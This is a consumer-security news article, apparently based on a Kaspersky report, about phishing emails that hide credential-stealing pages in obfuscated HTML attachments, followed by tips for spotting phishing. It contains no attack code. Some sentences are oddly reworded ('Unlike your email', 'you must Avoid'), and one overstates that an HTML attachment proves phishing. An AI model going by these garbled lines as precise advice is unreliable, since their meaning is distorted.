Cybercriminals are always looking for new ways to help phishing attempts bypass antivirus engines, and attaching HTML documents to email is an increasingly popular method for doing so.
Rather than inserting links to a phishing page in the body of an email where it will likely be found by email filters, malicious HTML attachments make it easier to disguise phishing content.
to me KasperskyThere are two main types of HTML attachments that cybercriminals use: HTML files with a link to a fake website or an entire phishing page. The first type allows the attacker to hide a link in the attached file as well as automatically redirect the potential victim to a fraudulent site while the second type of HTML attachments allows the attacker to bypass creating a fake website while saving on web hosting costs.
Malicious HTML attachments are a growing threat, and in the first four months of this year alone, Kaspersky detected nearly two million emails that contained them.
Hide phishing pages in attachments
Phishing content in HTML attachments is usually written in JavaScript in order to handle redirecting users to phishing sites or to obtain their credentials. Normally the HTML page sends the data to a malicious URL specified in the script itself. However, if the attachment contains malicious text or links in plain text, it can be blocked by antivirus and other security software – which is why cybercriminals use JavaScript obfuscation instead.
This technique involves moving code in a way that is difficult to read and understand. While some cybercriminals do this manually to make restoring the original code more difficult, others rely on any number of ready-made tools to do so.
Another technique used to hide phishing content in email attachments is to encode or compress their code so that it looks much smaller than it actually is. In one recent case, Kaspersky came across an email with a malicious HTML attachment that contained an entire phishing page encoded in a small two-line script.
How to spot a phishing website or email
Phishing sites come in all shapes and sizes but are often designed in such a way that they mimic legitimate web pages so that users don’t think twice when entering their credentials. Even if a cybercriminal makes an almost identical copy of a company’s web page, looking for misspellings on the page itself or checking its URL in your browser’s address bar can be a dead giveaway as a fake site.
To avoid your online accounts credentials being stolen by cybercriminals, you must Always head to a company’s login page via their website or through a search engine Unlike your email. This way you will know that you are going to the actual website instead of a fake website impersonating a brand or company.
When it comes to phishing emails, you should always do it Avoid opening emails from unknown senders. Another trick that cybercriminals use to lure you is to instill a sense of urgency into their messages. Companies and even the government rarely ask you to respond to one of their messages in a timely manner. At the same time, it’s worth noting that some government organizations like the IRS will never contact you via email and any tax issues will be reported to you by mail instead.
To avoid becoming a victim of phishing scams, you must Avoid opening emails from unknown senders This also applies to any attachments they contain. Although Word files, PDFs, and other office documents are usually attached to emails, very few people send through websites as HTML attachments and if you see an email with one in your inbox, you can be sure that It’s a phishing email.
Since phishing is often used to steal credentials to commit fraud or even identity theft, you can use a password manager to securely store your passwords and even create strong and complex passwords for each of your accounts to make them more difficult to hack or guess.
[ad_2]